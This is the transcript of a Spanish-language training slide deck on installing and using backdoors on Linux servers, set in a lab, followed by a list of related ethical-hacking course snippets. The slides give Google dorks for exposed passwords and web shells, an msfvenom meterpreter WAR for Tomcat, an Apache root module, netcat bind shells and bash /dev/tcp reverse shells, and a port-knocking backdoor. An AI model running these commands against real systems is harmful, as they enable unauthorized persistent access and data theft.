Backdoors en Sistemas Operativos. Instalación, configuración y uso de Backdoors
|
|
- Francisco Javier Ojeda Cortés
- hace 7 años
- Vistas:
Transcripción
1 Backdoors en Sistemas Operativos Instalación, configuración y uso de Backdoors
2 AGENDA 1. Quién soy? 2. Casos de Seguridad Informática en el Perú y el mundo 3. Buscando vulnerabilidades backdoors 4. Qué es un backdoor? 1. Backdoor SETUID 2. Backdoor Módulo de APACHE 3. Backdoor Bind Shell 4. Backdoor Reverse Shell 5. Backdoor KnockOut 5. Instalando y configurando backdoors (ejemplos) 6. Información sobre el curso 7. Conclusiones
3 AGENDA 1. Quién soy? 2. Casos de Seguridad Informática en el Perú y el mundo 3. Buscando vulnerabilidades 4. Qué es un backdoor? 5. Instalando y configurando backdoors (ejemplos) 6. Conclusiones
4 #whoami Ing. Sistemas ISO Lead Auditor, CISM, C EH, C)PTE, C)SWAE, C)PEH, ITILv3, C)ISSO, ISO Instructor Oficial de MILE2 Consultor de Kunak Consulting SAC Psicólogo que aun no comienza sus estudios. Escritor en mis tiempos libres: Correo electrónico: omarc320@gmail.com opalomino@kunak.com.pe Cuenta de Facebook:
5 AGENDA 1. Quién soy? 2. Casos de Seguridad Informática en el Perú y el mundo 3. Buscando vulnerabilidades 4. Qué es un backdoor? 5. Instalando y configurando backdoors (ejemplos) 6. Conclusiones
6 Quiénes nos amenazan?
7 Y esto. en realidad pasa?
8 Y esto. en realidad pasa?
9 Colaboradores Internos 90% Hackers Independientes 68% Contratistas o proveedores 66% Hacktivistas 54% Fuente E&Y Encuesta Global de Seguridad de Inf. 2014
10 DEMANDA y OFERTA de Hacking en el Perú
11 Una fuerte OFERTA
12 Una fuerte OFERTA
13 Y una más fuerte DEMANDA
14 Y una más fuerte DEMANDA
15 Y una más fuerte DEMANDA
16 Y una más fuerte DEMANDA
17 Y una más fuerte DEMANDA
18 Y una más fuerte DEMANDA
19 Google Dorks para buscar daterange: "Password=" inurl:web.config -intext:web.config ext:config intitle:!c99shell v. 1.0 site:.pe filetype:php intext:"!c99shell v. 1.0 beta Las personas siempre son los mejores backdoors
20 AGENDA 1. Quién soy? 2. Casos de Seguridad Informática en el Perú y el mundo 3. Qué es un backdoor? 4. Instalando y configurando backdoors (ejemplos) 5. Conclusiones
21 Qué es un Backdoor (puerta trasera)? Los backdoors son programas utilizados por los hackers para lograr acceso a sistemas operativos de manera rápida y sencilla. Existen diferentes tipos de backdoors: Backdoors en Aplicaciones Web Backdoors a través de SETUID Backdoors en Módulos de Servicios Backdoors del tipo Knocking
22 AGENDA 1. Quién soy? 2. Casos de Seguridad Informática en el Perú y el mundo 3. Qué es un backdoor? 4. Instalando y configurando backdoors (ejemplos) 5. Conclusiones
23 Arquitectura de los Ejemplos ATACANTE - Computador desde el cual se realizarán los ataques - Sistema Operativo KALI LINUX 2 TARGET - Servidor TOMCAT vulnerable - Aquí se instalaran los backdoors - Sistema Operativo Linux Dirección IP: Dirección IP: Dirección IP: ATACANTE 2 - Computador desde el cual se explotaran los backdoors - Sistema Operativo Linux
24 Identificar Servicios TOMCAT Buscamos TOMCAT en la RED LAN a través de NMAP Nmap sv p 8080 ss TARGET auxiliary/scanner/portscan/syn Buscamos TOMCAT/AXIS2 en INTERNET: Google Dork: intitle:"tomcat Server Administration intitle:"axis2 Happiness Page" +ext:jsp
25 Ahora si. Vamos con los ejemplos
26 Identificar Vulnerabilidades en TOMCAT Vamos a utilizar vulnerabilidades: METASPLOIT para identificar Root> msfconsole Root> search tomcat Root> use auxiliary/scanner/http/tomcat_mgr_login Root> show options Root> set RHOSTS Finalmente realizar la carga de un.war malicioso para obtener accesoal sistema operativo. msfvenom -p java/meterpreter/reverse_tcp LHOST= f war > meterpreter.war En el cliente: Msf> use exploit/multi/handler Msf> set payload java/meterpreter/reverse_tcp
27 Backdoor con SETUID De pronto algunos nunca escucharon de los permisos GETUID, SETUID y STICKY. Pues este mecanismo de backdoor está asociado a SETUID. Entonces en que consiste el SETUID? El SETUID es un bit que permite a las aplicaciones ejecutarse con los permisos de su propietario. El concepto puede sonar muy abstracto pero si ponemos un ejemplo es más facil entender, vamos a crear un archivo llamado TEST.C y lo compilamos.
28 Backdoor con SETUID
29 Backdoor en Apache Server Cargamos un módulo en APACHE de tal manera que no se realicen cambios a nivel de código en los aplicativos PHP. Cuántos administradores de Sistemas verifican los módulos cargados en Apache? Toca compilar un módulo de APACHE llamado ModROOTme. otkit/tree/master/mod_rootme-0.4
30 Backdoor en Apache Server Comandos en el Sistema Operativo root>cd mod_rootme-0.4/ root>make Linux root> cp mod_rootme2.so /etc/httpd/modules root> /etc/init.d/httpd reload En el cliente: Root> nc GET root
31 Backdoor: BindShell Las primeras herramientas utilizados por Hackers fue la navaja suiza NETCAT. Una BindShell es un programa corriendo una SHELL dentro de un proceso de red. Una BindShell puede estar escrita en cualquier lenguaje de programación. php
32 Backdoor: Bind Shell Comandos en el sistema operativo: root>./configure --enable-dgaping_security_hole root>make root> cd src/ root>./netcat -l -p e /bin/sh root> bg En el CLIENTE: C:\>nc64.exe
33 Backdoor: Reverse Shell Tiene el mismo concepto que una Bind Shell pero realizada de manera reversa. Ahora es el servidor quien se conecta a nuestro cliente. Esta pensado para poder realizar bypass de Firewalls.
34 Backdoor: Reverse Shell Reverse Shell con BASH En el cliente: nc64.exe -l -p vvv En el servidor: bash -i >& /dev/tcp/ /8080 0>&1
35 Backdoor: Reverse Shell Reverse Shell con NETCAT En el cliente: nc64.exe -l -p vvv En el servidor:./netcat -e /bin/sh
36 Backdoor: KnockOut Knock viene del ingles tocar la puerta. Este es un backdoor del tipo Reverse Shell que pasa desapercibido. Sólo puede ser accedido por aquel que conozca la combinación de la puerta correcta.
37 Backdoor: KnockOut En el servidor: Root> $make servidor Root>./knock-outd knock-out.conf eth5 En el cliente (atacante): Root> $make cliente Root>./knock-outc knock-out.conf Root>./netcat -lv -p 64876
38 AGENDA 1. Quién soy? 2. Casos de Seguridad Informática en el Perú y el mundo 3. Qué es un backdoor? 4. Instalando y configurando backdoors (ejemplos) 5. Información sobre el curso 6. Conclusiones
39 Conclusiones: - Instalar backdoors es la manera mas sencilla de acceder a servidor comprometidos. - Cuando un servidor Linux es comprometido se recomienda reestablecer un backup ya que detectar backdoors o rootkits es muy complicado.
40 PREGUNTAS?
CURSO DE ETHICAL HACKING
1. OBJETIVOS DEL CURSO 1.1. OBJETIVO GENERAL CURSO DE ETHICAL HACKING Brindar a los participantes los conocimientos, técnicas y habilidades utilizadas por hackers para realizar ataques informáticos. 1.2.
Más detallesDejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com
Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+. Administrador
Más detallesDejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com
Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+. Administrador
Más detallesEL MUNDO DEL PENTESTING
EL MUNDO DEL PENTESTING 1.- INTRODUCCION: Saludos a todos los que leen este articulo, bueno yo soy georgehack, también conocido con el pseudónimo de k43l para algunas comunidades de hacking, bueno pues
Más detallesPruebas de penetración para principiantes: explotando una vulnerabilidad con Metasploit Framework
Publicado en Revista.Seguridad (http://revista.seguridad.unam.mx) Inicio > Pruebas de penetración para principiantes: explotando una vulnerabilidad con Metasploit Framework Pruebas de penetración para
Más detallesUNIVERSIDAD TÉCNICA DEL NORTE FACULTAD DE INGENIERÍA EN CIENCIAS APLICADAS CARRERA DE INGENIERÍA EN SISTEMAS COMPUTACIONALES MANUAL TÉCNICO
UNIVERSIDAD TÉCNICA DEL NORTE FACULTAD DE INGENIERÍA EN CIENCIAS APLICADAS CARRERA DE INGENIERÍA EN SISTEMAS COMPUTACIONALES MANUAL TÉCNICO APLICATIVO SISTEMA DE PROCESO, CONTROL Y REGISTRO DE INFORMACIÓN
Más detallesProlite Security. HACKING WINDOWS 7.
HACKING WINDOWS 7. Que vamos hacer? Vamos a tomar el control completo de un sistema Windows 7 con antivirus y pondremos un backdoor para tener acceso cuando queramos. Que necesitamos? 2 maquinas virtuales:
Más detallesPrograma Administración Linux
Programa Administración Linux Proporcionar los conocimientos teórico-prácticos, para: Instalar, configurar y administrar el sistema operativo Linux. Instalar, configurar, asegurar y administrar correctamente
Más detallesPues nos adentramos de lleno y desde hoy, a las técnicas, tácticas y contramedidas utilizadas en el Ethical Hacking (Hacking Ético).
Pues nos adentramos de lleno y desde hoy, a las técnicas, tácticas y contramedidas utilizadas en el Ethical Hacking (Hacking Ético). Comenzamos con algunos laboratorios sencillos y simples que nos permitirán
Más detallesSECURITY DAY PERU. Ataques a la familia de Sistemas Operativos Windows. Explotando Vulnerabilidades a Servicios / Ataques a Clientes.
SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a la familia de Sistemas
Más detallesEscaneo de un sistema con Backtrack 4
Escaneo de un sistema con Backtrack 4 El escaneo de un sistema es el siguiente paso a llevar después de haber conocido nuestro objetivo, debemos puerto o que medios de comunicación esta utilizando. Vamos
Más detallesEthical Hacking. Programa de Estudio.
Ethical Hacking Programa de Estudio Ethical Hacking Aprende las técnicas más utilizadas por los hackers y cómo utilizarlas para analizar la seguridad de las redes empresariales, formulando reportes tanto
Más detallesPRUEBAS DE PENETRACIÓN PARA PRINCIPIANTES: 5 HERRAMIENTAS PARA EMPEZAR
Published on Revista.Seguridad (https://revista.seguridad.unam.mx) Inicio > Pruebas de penetración para principiantes: 5 herramientas para empezar PRUEBAS DE PENETRACIÓN PARA PRINCIPIANTES: 5 HERRAMIENTAS
Más detallesDiplomado CiberSeguridad defensa y ataque de un ecosistema tecnológico.
Diplomado CiberSeguridad defensa y ataque de un ecosistema tecnológico. TPX MX SA DE CV. Diplomado Presencial. Edición 1, Año 2017. https://tpx.mx/diplomados/ hola@tpx.mx tpx.mx @tpx_mx tpx.mx CiberSeguridad
Más detallesLinux Completo (Versión Ubuntu 9)
Descripción Sistema operativo Linux: Redes y Servidores Objetivos Al realizar este curso, el alumno adquirirá las siguientes habilidades y conocimientos: Instalar Linux en su equipo. Conocer las terminales
Más detalles100% Laboratorio en vivo
Sabemos que la única forma de aprender es haciendo. Por lo mismo todos los laboratorios son con desafíos de hacking en un ambiente en vivo. Con servidores y servicios dentro de nuestro laboratorio de hacking,
Más detallesLinux Completo (Versión Ubuntu 9)
Linux Completo (Versión Ubuntu 9) Duración: 100.00 horas Descripción Sistema operativo Linux: Redes y Servidores Objetivos Al realizar este curso, el alumno adquirirá las siguientes habilidades y conocimientos:
Más detallesRequisitos Previos de Instalación Conceptos básicos a manejar antes de avanzar con el curso.
Capitulo I Que es joomla? Joomla es un Sistema de Gestión de Contenidos (o CMS, por las siglas en inglés, Content Management System) que permite desarrollar sitios web dinámicos e interactivos. Permite
Más detallesEthical hacking, una metodología para descubrir fallas de seguridad en sistemas informáticos mediante la herramienta KALI-LINUX
INFORMÁTICA Y SISTEMAS REVISTA DE TECNOLOGÍAS DE LA INFORMÁTICA Y LAS COMUNICACIONES UNIVERSIDAD TÉCNICA DE MANABÍ Vol.1 N.1 Año 1 (2017) Ethical hacking, una metodología para descubrir fallas de seguridad
Más detallesUbuntu Server HOW TO : NIS. EN ESTE SE REALIZA LO SIGUIENTE: En este how to se le va a enseñar como utilizar un dominio bajo Linux NIS.
Ubuntu Server 12.10 HOW TO : NIS EN ESTE SE REALIZA LO SIGUIENTE: En este how to se le va a enseñar como utilizar un dominio bajo Linux NIS. Que es NIS? Network Information Service (conocido por su acrónimo
Más detallesInstalación de Servidor LAMP en CentOS 5.4
Instalación de Servidor LAMP en CentOS 5.4 Manual creado por: Rodrigo Muñoz M. ZuRdOk 1 Índice. Introducción 3 Instalación httpd 4 Instalación MySQL 5 Instalación PHP5 8 Conlusión 12 2 Introducción En
Más detallesLima, 24 Setiembre, 2011 OMARC320@GMAIL.COM
Lima, 24 Setiembre, 2011 OMARC320@GMAIL.COM AGENDA 1 Acerca del autor 2 Introducción al Ethical Hacking 3 Ethical Hacking vs Pentesting 4 Escaneo de red organizacional 5 Análisis de Vulnerabilidades 6
Más detallesInstalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis.
Actividad 4. Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis. MBSA: instalamos Microsoft Baseline Security Analyzer (es gratis), y pulsamos en la opción Scan a computer. GFI Languard:
Más detallesEn próximos posts iré desarrollando el tema de LAMP más en prufundidad.
LAMP CAPÍTULO I - INSTALACIÓN LAMP es un conjunto de tecnologías de software de código abierto compuesto por Linux, Apache, Mysql y Php para el desarrollo web, muy utilizado hoy día para la creación de
Más detalleseica IT DDesenvolvemento e Formación
OPEN SYSTEM eica IT DDesenvolvemento e Formación HACKING ÉTICO CARACTERÍSTICAS DURACIÓN Solicita información OBJETIVOS El programa de estudios prepara a: Responsables de red informática o responsables
Más detallesPENTESTING CON KALI LINUX
PENTESTING CON KALI LINUX Antecedentes Debido a la dependencia actual en la tecnología, las empresas no se pueden dar el lujo de desproteger el acceso a sus redes y sistemas con el riesgo de ver comprometida
Más detallesinfo.uruguay@isec-global.com 4342-4685 4342-2079 4342-5440 www.isec-global.com
thical Ethical La permanente exposición al riesgo de robo, extravío, alteración o delitos sobre la información confidencial de las empresas, las sitúa en una posición bastante delicada y critica, por lo
Más detallesCURSO EN SEGURIDAD INFORMÁTICA
CURSO EN SEGURIDAD INFORMÁTICA *AMNISTÍA* INTRODUCCIÓN Uno de los objetivos más importantes en Seguridad Informática es garantizar la CONFIDENCIALIDAD, INTEGRIDAD Y DISPONIBILIDAD de la información empresarial
Más detallesDISCLAIMER Todo el contenido de esta charla es resultado de investigación con fines didácticos y educativos. El autor no se hace responsable por el uso del conocimiento contenido en la siguiente presentación.
Más detallesHacking Ético de Sistemas y Redes Nivel: Avanzado. Ficha técnica
Hacking Ético de Sistemas y Redes Nivel: Avanzado Ficha técnica Datos del curso Duración: 40 horas / 2 meses Modalidad: E Learning 100 % Curso organizado por: (www.svtcloud.com) Responsable del curso:
Más detallesHow to 16 Firewall. Jesús Betances Página 1
How to 16 Firewall Jesús Betances 2011-3914 Página 1 Qué es el Firewall? Un firewall es un dispositivo que filtra el tráfico entre redes. El firewall puede ser un dispositivo físico o un software sobre
Más detallesAGENDA. Introducción al Ethical Hacking. Ethical Hacking vs Pentesting. Escaneo de red organizacional. Análisis de Vulnerabilidades
OMARC320@GMAIL.COM AGENDA 1 Acerca del autor 2 Introducción al Ethical Hacking 3 Ethical Hacking vs Pentesting 4 Escaneo de red organizacional 5 Análisis de Vulnerabilidades 6 Explotación de Vulnerabilidades
Más detallesAuditando con Nmap y sus scripts para escanear vulnerabilidades
Auditando con Nmap y sus scripts para escanear vulnerabilidades Actualmente existen diversas herramientas de seguridad que se encargan de ejecutar diferentes funcionalidades, y si hablamos de auditorías
Más detallesAcceso a un sistema con Backtrack 4
Acceso a un sistema con Backtrack 4 En este manual veremso algunas de las diferentes formas mas basicas de como accerder a un sistema utilizando esta gran herramienta (Backtrack 4), tratare de ser lo mas
Más detallesSeguridad Web: SQL Injection & XSS
Seguridad Web: SQL Injection & XSS Programa de Estudio Seguridad Web: SQL Injection & XSS Aprende las técnicas más utilizadas por los hackers para vulnerar aplicaciones web y cómo utilizarlas para analizar
Más detallesSeguridad Web: SQL Injection & XSS
Seguridad Web: SQL Injection & XSS Programa de Estudio Seguridad Web: SQL Injection & XSS Aprende las técnicas más utilizadas por los hackers para vulnerar aplicaciones web y cómo utilizarlas para analizar
Más detallesDIPLOMADO EN SEGURIDAD EN REDES MICROSOFT
DIPLOMADO EN SEGURIDAD EN REDES MICROSOFT Hackers, virus, panes. Cuáles son los conocimientos de seguridad que un CSO (Chief Security Officer) debe desarrollar y adoptar para prevenirse contra el bombardeo
Más detallesCÓMO INSTALAR FIDESGEM EN RED
CÓMO INSTALAR FIDESGEM EN RED La aplicación FidesGeM está preparada para trabajar en red. Su configuración es sencilla, aunque en algunos equipos, dependiendo de sus características (versión de Windows,
Más detallesEXPERTO EN ADMINISTRACIÓN Y SEGURIDAD DE REDES INFORMÁTICAS
Instituto de Formación Profesional CBTech Estudie desde su hogar y obtenga un certificado universitario Formación a distancia de EXPERTO EN ADMINISTRACIÓN Y SEGURIDAD DE REDES INFORMÁTICAS 1 Temario del
Más detallesInstalación de una IP-PBX en Linux
Anexo Instalación de una IP-PBX en Linux Para todo el manual desarrollado los comandos que se deben utilizar pueden variar cuando se trate de archivos con versiones que pueden ser actualizadas, por ejemplo
Más detallesMg. Ing. Pablo Romanos. 1, 2, 3 y 4 de octubre de 2017 Buenos Aires Argentina
Mg. Ing. Pablo Romanos 1, 2, 3 y 4 de octubre de 2017 Buenos Aires Argentina Penetration Test o Test de Intrusión: Un Penetration Test, es una evaluación del estado de seguridad a nivel lógico de una infraestructura
Más detalles..::[Manual Basico Metasploit]::..
..::[Manual Basico Metasploit]::.. Creador TheJez 1) Conceptos Basicos 2) Modalidades 3) Comienzos 4) Exploits 5) Actualizar 1. Conceptos Basicos. Para empezar a hablar del metasploit, lo definiremos como
Más detallesPresentación del Curso Presencial LINUX - LPIC: MANEJO Y ADMINISTRACIÓN DE SISTEMAS OPERATIVOS DE CODIGO ABIERTO
Presentación del Curso Presencial LINUX - LPIC: MANEJO Y ADMINISTRACIÓN DE SISTEMAS OPERATIVOS DE CODIGO ABIERTO Tabla de contenido LINUX - LPIC... 3 Presentación del curso... 3 Objetivos de aprendizaje...
Más detallesTEMARIO. Linux Básico - Intermedio >>DURACIÓN DEL CURSO 40 HRS
TEMARIO Linux Básico - Intermedio >>DURACIÓN DEL CURSO 40 HRS >> INTRODUCCIÓN AL CURSO Introducción al Software Libre, Código Abierto GNU/Linux y distribuciones Tipos de Licenciamiento Ventajas y desventajas
Más detallesAdministración de Servidores y Redes LINUX
Administración de Servidores y Redes LINUX Juan Pablo Braña Sábado 29 de Junio de 2002 III Jornadas de Informática en Santa Fe Universidad Nacional de Litoral Facultad de Ingenieria y Ciencias Hídricas
Más detallesLinux Avanzado: Redes y Servidores (Versión Ubuntu)
Linux Avanzado: Redes y Servidores (Versión Ubuntu) Duración: 60.00 horas Páginas del manual: 308 páginas Descripción Sistema operativo Linux: Redes y Servidores Objetivos Al realizar este curso, el alumno
Más detallesEEHC. Enhacke Ethical Hacking Certification
EEHC Enhacke Ethical Hacking Certification Curso de Certificación de Hacking Ético ENHACKE S.A.C. Año 2010 ENHACKE ETHICAL HACKING CERTIFICATION EEHC INTRODUCCION El curso EEHC provee el conocimiento necesario
Más detallesManual de Usuario. HISMINSA Sistema de Gestión Asistencial (Versión Offline para XP) Ministerio de Salud del Perú Todos los Derechos Reservados
Manual de Usuario HISMINSA Sistema de Gestión Asistencial (Versión Offline para XP) Ministerio de Salud del Perú 2015 - Todos los Derechos Reservados Introducción El Ministerio de Salud del Perú a través
Más detallesAPROVECHAMIENTO DE VULNERABILIDADES DEL SISTEMA OPERATIVO WINDOWS CON LA HERRAMIENTA METASPLOIT
APROVECHAMIENTO DE VULNERABILIDADES DEL SISTEMA OPERATIVO WINDOWS CON LA HERRAMIENTA METASPLOIT sistema operativo de Windows con la herramienta Metasploit Susan Arévalo 1 Giancarlo Infante 1 Dany Valdivia
Más detallesComo instalar Un Foro con phpbb en Linux Canaima
Como instalar Un Foro con phpbb en Linux Canaima Perfectamente aplicable en otras distribuciones como debian o ubuntu REQUISITOS Para instalar phpbb en un equipo con Sistema Operativo Linux en imprescindible
Más detallesSISTAM Ingeniería. DOCUMENTO Manual de Instalación y Configuración SISTEMA HC Página 1 de 5 INFORMATICA FECHA 27/08/2013 INDICE
SISTEMA HC Página 1 de 5 INDICE 1. IDENTIFICACIÓN DEL PROYECTO/APLICACIÓN 2 2. AMBIENTE DE INSTALACIÓN 2 3. IDENTIFICACIÓN DE AMBIENTE DE INSTALACIÓN: 2 4. REQUERIMIENTOS DE HARDWARE 2 5. HERRAMIENTAS
Más detallesConfiguración de la Xpy530 con función DDNS
Configuración de la Xpy530 con función DDNS Configuración de la Xpy530 con función DDNS Pasos preliminares: 1. Para poder asignar una dirección IP compatible con la cámara Xpy530, ingresar al router y
Más detallesLaboratorio 6.1: Phishing con SET y Metasploit
Laboratorio 6.1: Phishing con SET y Metasploit En el laboratorio actual usted aplicará los conocimientos adquiridos en el capítulo de Hacking para demostrar lo fácil que es ejecutar un ataque de Phishing
Más detallesMultiplatform Network Administrator (160 Horas)
En este curso, el participante instalará y configurará los sistemas operativos. Además, identificará las características de los entornos de gestión y realizará las tareas administrativas. Así mismo, ejecutará
Más detallesÍNDICE Pág. 1. Requisitos de Instalación 2
ÍNDICE Pág. 1. Requisitos de Instalación 2 2. Instalando la Base de Datos 2 3. Instalando la Plataforma Framework 6 4. Instalando la Aplicación 7 5. Configuraciones Adicionales 8 1 Este manual es creado
Más detallesManual de instalación de la Base de Datos fenitel.net en gnulinex 2004r1.
Manual de instalación de la Base de Datos fenitel.net en gnulinex 2004r1 http://www.linex.org Este manual ha sido creado para la instalación de la Base de Datos fenitel.net en la versión GNU/Linux: gnulinex
Más detallesLeonardo Huertas Calle SamuraiBlanco
Cer4fied Ethical Hacker Leonardo Huertas Calle SamuraiBlanco Conclusiones Disclaimer La información presentada en esta conferencia es de carácter académico y su finalidad es brindar un panorama real del
Más detallesHacking Ético & Seguridad Informática para Empresas
Hacking Ético & Seguridad Informática para Empresas Alonso Eduardo Caballero Quezada Consultor en Hacking Ético, Informática Forense & GNU/Linux Sitio Web: http://www.reydes.com e mail: ReYDeS@gmail.com
Más detallesTroyanizando Windows 10 con Kali Linux 2016
Troyanizando Windows 10 con Kali Linux 2016 Luigi Guarino 30/11/2017 luigiasir.wordpress.com Índice Introducción... 3 1. Preparación del entorno... 3 Troyanizar Windows 10... 4 1. Crear backdoor... 4 2.
Más detallesUD 1. Instalación de servidores web
IINSTALACIIÓN Y CONFIIGURACIIÓN DE XAMPP PROCESO DE INSTALACIÓN DE XAMPP PANEL DE CONTROL DE XAMPP Ejecutar el panel de control como administrador Aplicaciones como Servicio vs. Standalone Ejecutables
Más detallesTEMARIO Y CRONOGRAMA DE CLASES. Introducción a Linux. Entornos gráficos. Instalación. Uso de consola. Manejo de archivos.
TEMARIO Y CRONOGRAMA DE CLASES Introducción a Linux. Entornos gráficos. Instalación. Uso de consola. Manejo de archivos. Estructura Unix y los Sistemas de Archivos. Editor VI. Shell Control de procesos.
Más detallesSchool of Hacking. Taller 3: Herramientas básicas del hacker: Metasploit y Armitage
School of Hacking Taller 3: Herramientas básicas del hacker: Metasploit y Armitage Antonio Díaz Díaz & José José Antonio Gómez, 2015 2015 Índice Metasploit Framework (José Antonio Gómez) Terminología Msfconsole:
Más detallesUNAB TECNOLOGICA GUÍA DE CÁTEDRA
UNAB TECNOLOGICA GUÍA DE CÁTEDRA 1. Identificación del curso 1.1 Escuela / Departamento: UNAB TECNOLOGICA 1.3 Programa: Técnico Laboral en y Hardware de Computadoras 1.5 Carrera: Téc. Lab. en y Hardware
Más detallesADMINISTRACIÓN DE SERVIDORES CON
ADMINISTRACIÓN DE SERVIDORES CON Que es: Webmin se ejecuta en un servidor web, por ejemplo apache y consiste en un conjunto de programas escritos en CGI escritos en Perl versión 5. Desde Webmin se pueden
Más detallesMANUAL DE INSTALACIÓN FENG-OFFICE 2.7.1.5
MANUAL DE INSTALACIÓN FENG-OFFICE 2.7.1.5 EN CANAIMA PREFACIO El presente documento fue desarrollado con la finalidad de explicar los pasos a seguir para instalar Feng-Office en un computador con Sistema
Más detallesComo instalar ireport en Linux Por Jaibol Santaella
Como instalar ireport En CANAIMA La misión de este manual, es enseñarte como instalar en linux herramientas de software libre que permiten generar los archivos PDF en tus programas Java. Con este documento
Más detallesMANUAL DE INSTALACIÓN GLPI 0.84.7 EN CANAIMA
MANUAL DE INSTALACIÓN GLPI 0.84.7 EN CANAIMA Caracas Noviembre del 2014 Desarrollado por Jaibol Santaella PREFACIO El presente documento fue desarrollado con la finalidad de explicar los pasos a seguir
Más detallesINSTALACIÓN Y CONFIGURACIÓN DNS PRIMARIO MEDIANTE WEBMIN
En esta práctica aprenderemos a crear y configurar un servidor DNS totalmente operativo en Ubuntu. Para ello vamos a utilizar una máquina virtual y la máquina local, las cuales las dos son Ubuntu. Previamente
Más detallesLinux Completo (Version Ubuntu 9)
Linux Completo (Version Ubuntu 9) Área: Informática Modalidad: Teleformación Duración: 100 h Precio: Consultar Curso Bonificable Solicita información Añade al archivador Recomienda a un amigo OBJETIVOS
Más detallesALLEN LINUX. Todas las computadoras poseen una memoria llamada cache, significa en inglés to
ALLEN LINUX Descargar vídeos de Youtube Todas las computadoras poseen una memoria llamada cache, significa en inglés to catch; tener atrapar, tomar. Es un tipo de memoria temporal. Cuando se carga un vídeo
Más detallesExamen 1ª Evaluación. 1 of 13 7/9/2013 8:51 PM. Comenzado: Jul 9 en 8:51pm. Question 1: 1 puntos Un ejemplo de aplicación es:
Examen 1ª Evaluación Comenzado: Jul 9 en 8:51pm Question 1: 1 puntos Un ejemplo de aplicación es: kernel IIS fat 16 Linea de comandos Question 2: 1 puntos Cual de los siguientes no es un tipo de sistema
Más detallesParalelo 1? Evaluaciones? SOR Examen 2 EVA Teórico. Comenzado: Feb 11 en 10:15pm. Pregunta 1: 1 puntos Un ejemplo de aplicación es:
Evaluación: SOR - Examen 2 EVA Teórico Paralelo 1? Evaluaciones? SOR Examen 2 EVA Teórico Comenzado: Feb 11 en 10:15pm Pregunta 1: 1 puntos Un ejemplo de aplicación es: Linea de comandos IIS fat 16 kernel
Más detallesTitulo. Documentoo. Tipo de. Informática. Un servidor web. música. reproductores de. Entre Server.
Titulo Descripción Tipo de Documentoo Numero de documento Asignatura Instalación de un servidor web local Define, reconoce e instala un servidor web local utilizando el paquete Appserv 2.5.10 o Wampserv
Más detallesApartado: Configuración servicios de un servidor PXE. Versión: 3.0 Título: Programa Netcat Fecha: 22/11/07
*PRÓPOSITO. Netcat (a menudo referida como la navaja multiusos de los hackers o para expertos en seguridad) es una herramienta de red bajo licencia GPL disponible para sistemas UNIX, Microsoft y Apple
Más detallesServiceTonic - Guía de Instalación ] ServiceTonic. Guía de instalación GUÍA DE INSTALACIÓN
ServiceTonic - Guía de Instalación ] ServiceTonic Guía de instalación GUÍA DE INSTALACIÓN 1. Información general 1.1 Introducción El presente documento describe como instalar ServiceTonic en diferentes
Más detallesNavegando al Día. Publicado en Revista.Seguridad (http://revista.seguridad.unam.mx) Inicio > Navegando al Día. Por David Eduardo Bernal Michelena
Publicado en Revista.Seguridad (http://revista.seguridad.unam.mx) Inicio > Navegando al Día Navegando al Día Por David Eduardo Bernal Michelena numero-09 [1] Buenas prácticas [2] navegador [3] Las actualizaciones
Más detallesNombre del documento: Programa de Estudio de asignatura de Especialidad. Nombre de la asignatura: Protección de Sistemas Operativos
1.- DATOS DE LA ASIGNATURA Nombre de la asignatura: Protección de Sistemas Operativos Carrera: Ingeniería en Sistemas Computacionales Clave de la asignatura: SIF-1205 (Créditos) SATCA: 3-2-5 2.- PRESENTACIÓN
Más detallesUbuntu Server HOW TO : SERVIDOR DE IMPRESORAS
Ubuntu Server 12.10 HOW TO : SERVIDOR DE IMPRESORAS EN ESTE SE REALIZA LO SIGUIENTE: En este how to se le va a enseñar como instalar CUPS y como administrar. Common Unix Printing System (Sistema de impresión
Más detallesImplementación de una Solución Tecnológica para la Gestión y Control de la Planificación Institucional del Gobierno Regional de Los Lagos
Gobierno Regional de Los Lagos Implementación de una Solución Tecnológica para la Gestión y Control de la Planificación Institucional del Gobierno Regional de Los Lagos Entrega del Sistema Diciembre 6
Más detallesAnexo IV Vulnerabilidades más críticas de los sistemas informáticos
Anexo IV Vulnerabilidades más críticas de los sistemas informáticos Álvaro Gómez Vieites ANEXO IV VULNERABILIDADES MÁS CRÍTICAS DE LOS SISTEMAS INFORMÁTICOS LAS 20 VULNERABILIDADES MÁS CRÍTICAS SEGÚN
Más detallesServidor WEB SERVICIOS DE RED
Servidor WEB SERVICIOS DE RED 2º ASIR 16-11-2017 Índice: 1. Introducción... 2 2. Preparación laboratorio Virtual... 2 3. Instalación Servidor Web... 2 3.1. Página por defecto... 3 3.2. Página personalizada...
Más detallesMANUAL DE INSTALACIÓN GLPI 0.84.7
República Bolivariana de Venezuela Fundación Bolivariana de Informática y Telemática (Fundabit) MANUAL DE INSTALACIÓN GLPI 0.84.7 EN LINUX Caracas Noviembre del 2014 Desarrollado por Jaibol Santaella PREFACIO
Más detallesManual para configurar un servidor AppServ En una computadora. Y operar el sistema SICAM en intranet. Nucúncu Tecnología
Manual para configurar un servidor AppServ En una computadora. Y operar el sistema SICAM en intranet. Nucúncu Tecnología www.nucuncu.com Nucúncu Tecnología. www.nucuncu.com Manual para configurar un servidor
Más detallesWeb Application exploiting and Reversing Shell
OWASP Perú Chapter Meeting The OWASP Foundation http://www.owasp.org Web Application exploiting and Reversing Shell Juan Oliva @jroliva jroliva@gmail.com Copyright The OWASP Foundation Permission is granted
Más detallesDescripción y Contenido del Curso. Windows Server Capacity Academy.
Descripción y Contenido del Curso Windows Server 2012 Capacity Academy Educación en Tecnología de la Información Online, Efectiva y Garantizada Qué aprenderá si toma este Curso? En este curso aprenderás
